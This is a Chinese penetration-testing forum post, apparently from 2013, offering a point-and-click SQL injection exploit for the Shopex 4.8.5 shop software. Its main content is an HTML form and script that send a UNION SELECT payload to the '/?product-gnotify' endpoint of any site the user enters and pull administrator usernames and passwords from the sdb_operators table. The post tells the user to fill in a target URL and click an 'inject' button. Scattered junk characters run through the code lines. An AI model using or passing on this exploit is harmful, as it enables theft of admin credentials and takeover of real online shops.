找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Shopex 4.8.5 SQL Injection Exp 0day
返回列表 发新帖
查看: 2226|回复: 0
打印 上一主题 下一主题

Shopex 4.8.5 SQL Injection Exp 0day

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:20:52 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<center>' `0 Q, ?8 G" ^, w/ {4 y
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>& @, d: r0 q; j- o' H
<form action="" method="post" name="submit_url">: s2 H$ e) `+ k% a% p9 Z- b# \
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>! T6 u0 A! n& y+ i4 x
<input type="hidden" name="goods[goods_id]" value="3">
& C$ U' b2 v5 {; E<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">/ V% }+ q' d- [0 z
<input type="submit" value="给我注入"  onclick=fsubmit()>( N1 O8 ?. f: H: R$ W) [+ {
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com) B- d, f0 i3 X& A

' G9 z# Z# p* q<script>
9 M8 i5 u: X' y3 H3 q; j- O6 hfunction fsubmit(){ & M! q# d) P6 h, L
form = document.forms[0]; 5 r& c- P( y, T9 u. P: A! \
form.action = form.url.value+'/?product-gnotify';
9 o, r: f  z2 N& ^+ U5 C) D, Sform.submit();
& z  ^# t" f0 ?) c4 w! M$ ^} * ]& \0 n; n5 S* V1 }- u. l3 \) n
</script>" J/ d* o- U# A; V5 d* P
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表